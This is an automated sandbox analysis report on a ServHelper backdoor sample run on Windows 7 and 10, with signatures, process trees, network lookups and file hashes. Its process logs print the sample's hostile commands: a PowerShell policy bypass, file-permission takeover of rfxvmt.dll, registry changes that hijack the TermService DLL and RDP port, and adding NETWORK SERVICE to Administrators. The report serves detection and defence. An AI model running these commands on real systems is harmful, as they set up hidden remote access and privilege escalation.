Malware Analysis Report

2024-08-06 05:35

Sample ID 240405-fe1kxsda24
Target cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118
SHA256 ee5d82cd5e61b518572b4415797ee407cff1d28a2e0b43a2baec7236c37695eb
Tags
servhelper backdoor discovery exploit persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ee5d82cd5e61b518572b4415797ee407cff1d28a2e0b43a2baec7236c37695eb

Threat Level: Known bad

The file cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence trojan

ServHelper

Grants admin privileges

Possible privilege escalation attempt

Sets DLL path for service in the registry

Modifies RDP port number used by Windows

Modifies file permissions

Drops file in System32 directory

Drops file in Windows directory

Unsigned PE

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Runs net.exe

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-04-05 04:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-05 04:47

Reported

2024-04-05 04:50

Platform

win7-20240319-en

Max time kernel

118s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Sets DLL path for service in the registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" C:\Windows\SysWOW64\reg.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\rfxvmt.dll C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\rdpclip.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\branding\Basebrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\icacls.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1372 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 2440 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2440 wrote to memory of 2752 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2136 wrote to memory of 2724 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 2484 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 1964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 1524 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\takeown.exe
PID 2136 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 1900 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2920 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 3016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2616 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 1304 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 2136 wrote to memory of 2028 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2136 wrote to memory of 1368 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\miiif39e.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES512D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC512C.tmp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile

C:\Windows\SysWOW64\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\SysWOW64\cmd.exe

cmd /c net start rdpdr

C:\Windows\SysWOW64\net.exe

net start rdpdr

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\SysWOW64\cmd.exe

cmd /c net start TermService

C:\Windows\SysWOW64\net.exe

net start TermService

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\ready.ps1

\??\c:\Users\Admin\AppData\Local\Temp\miiif39e.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\miiif39e.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\CSC512C.tmp

C:\Users\Admin\AppData\Local\Temp\RES512D.tmp

C:\Users\Admin\AppData\Local\Temp\miiif39e.dll

C:\Users\Admin\AppData\Local\Temp\miiif39e.pdb

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

\??\PIPE\srvsvc

C:\Windows\SysWOW64\rfxvmt.dll

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-05 04:47

Reported

2024-04-05 04:50

Platform

win10v2004-20240226-en

Max time kernel

146s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Sets DLL path for service in the registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" C:\Windows\SysWOW64\reg.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\rdpclip.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\rfxvmt.dll C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\shellbrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\icacls.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3332 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 3636 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3636 wrote to memory of 1340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 5092 wrote to memory of 1480 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 2848 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 2332 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 4684 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\takeown.exe
PID 5092 wrote to memory of 2148 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 4508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 2112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 2820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 2064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 3636 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\icacls.exe
PID 5092 wrote to memory of 3608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 5092 wrote to memory of 1984 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 5092 wrote to memory of 4084 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 5092 wrote to memory of 2340 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\net.exe
PID 2340 wrote to memory of 3068 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 5092 wrote to memory of 5096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 5096 wrote to memory of 3968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 5096 wrote to memory of 3968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3968 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hkebzj0b\hkebzj0b.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC8BE.tmp" "c:\Users\Admin\AppData\Local\Temp\hkebzj0b\CSCB48E594DDE1644258116C5674D749743.TMP"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\SysWOW64\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\SysWOW64\cmd.exe

cmd /c net start rdpdr

C:\Windows\SysWOW64\net.exe

net start rdpdr

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\SysWOW64\cmd.exe

cmd /c net start TermService

C:\Windows\SysWOW64\net.exe

net start TermService

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 138.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 145.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3eop0myz.x5o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

\??\c:\Users\Admin\AppData\Local\Temp\hkebzj0b\hkebzj0b.cmdline

MD5 947abf591dbf321409f38aeb2a3a3072
SHA1 9ac4db381c0a1c257d4886bfbc630c7e8469be82
SHA256 a888796c34418732d33663846092d16d9940d32d4f5ad2f2183024147f8be8db
SHA512 87aeb78d21518280d1c012d9bc115eed592e44025a8843fc745a4d11efee76ea35f26081240a2a72cf2e3d88f4eb9b148e1a06489ed2c82c41ca371b96c8826c

\??\c:\Users\Admin\AppData\Local\Temp\hkebzj0b\hkebzj0b.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

\??\c:\Users\Admin\AppData\Local\Temp\hkebzj0b\CSCB48E594DDE1644258116C5674D749743.TMP

MD5 216a7f213b3840a471c20b967436ccc5
SHA1 cc95009d8a4be42486538345d9d33037c15c48ab
SHA256 ceb2031e43595541e82fd58c550b239b3203de44aaf02d8056b64ffbb65aa64c
SHA512 9c99222ec93600afbc555130c993a2ad4d6664cf1359b2be24d1d9515a823b2ec4af640c37dca036f2510c06fdbd85a64154d6dc70b73fd678de4bc07d9e7d38

C:\Users\Admin\AppData\Local\Temp\RESC8BE.tmp

MD5 e2ff148a195602967a078ffa782d563e
SHA1 e6f8436b141fd4a67b835ac01d4db9ac91430d87
SHA256 27145f5a87f8447c15d9e5a4d1febceb56da0933d28fa8f233262dc116065374
SHA512 eb84de59250991956af5d1fd5e52c6587040db967493e9f3c84ef98161055758ec1607ff24fa8bf36208dd1a25aa4076ebb63e5a73ae863c19bed9d0ee3cfb33

C:\Users\Admin\AppData\Local\Temp\hkebzj0b\hkebzj0b.dll

MD5 09102fe0b7e6302f160ab0fcde307c4b
SHA1 2b7a7bca1a5ac90613abad1941aa3d25c5288831
SHA256 fc08a3e14a7b6f71ca88cc749905934e63eb813c22d765aa6a3c84b61a75cfeb
SHA512 5cc111e0ee3b0f7f841456cf26f2593fdf5dad705c61829af2c775a3fd5e5b27345d911f64aac2d156be3942eede99512248e6f5aab9d07e6e3b2ce71c3f6ec4

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 841cc93778b4ec353d0075d717b90df4
SHA1 287f652b7be199d127aab4655055654a6ea2bed6
SHA256 77f2e15c057346682081eae41389c9d91ba710c2f91107a9c59543c71cf6cad1
SHA512 a98053ebe4279d8b312a27f634ca2a9b4d929e15f8d27bdb2e89706a9fa967035e58a5d5cec2be0e5ea763b8c278884863f91d8ca270d4a30a20c51d00b72541

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 e2e6bbdcc5cb2b2a8e58e62380cbdeeb
SHA1 fd3b0bbf8d08573d022e54ceb111e4dfe93ff752
SHA256 2cf90543f0e785093db02f3ce60471d639ec8e5030a2ea0d70187ce55c248cf2
SHA512 82ff827ccb3eb01f00713dfcf4d2ef8107c86d206698a366293bb723e36d9a20dba44c818d40e79824fd72c76987e71d69565a3079bccaaa0626d64a13014317

C:\Windows\SysWOW64\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7